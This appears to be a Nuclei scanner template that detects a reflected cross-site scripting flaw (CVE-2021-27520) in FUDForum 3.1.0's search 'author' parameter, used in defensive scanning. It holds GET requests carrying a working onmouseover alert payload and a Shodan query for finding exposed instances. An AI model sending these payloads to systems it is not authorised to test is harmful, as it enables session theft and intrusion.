59 lines
2.3 KiB
YAML
59 lines
2.3 KiB
YAML
id: CVE-2021-27520
|
|
|
|
info:
|
|
name: FUDForum 3.1.0 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
|
|
remediation: |
|
|
Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/49943
|
|
- https://github.com/fudforum/FUDforum/issues/2
|
|
- http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27520
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-27520
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00217
|
|
epss-percentile: 0.5946
|
|
cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: fudforum
|
|
product: fudforum
|
|
shodan-query: html:"FUDforum"
|
|
tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive,fudforum
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D'
|
|
- '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D%22'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- onmouseover=alert(document.domain) x=
|
|
- FUDforum
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220711bb05e6e22f2a47cefe31239e627c17cf0b0fb8921d7748500f52c22389830022100e3bbb135d2d2e7bbb25d30dbfca90fba11f74d00a5e1e29809defbedcf0e8831:922c64590222798bb761d5b6d8e72950 |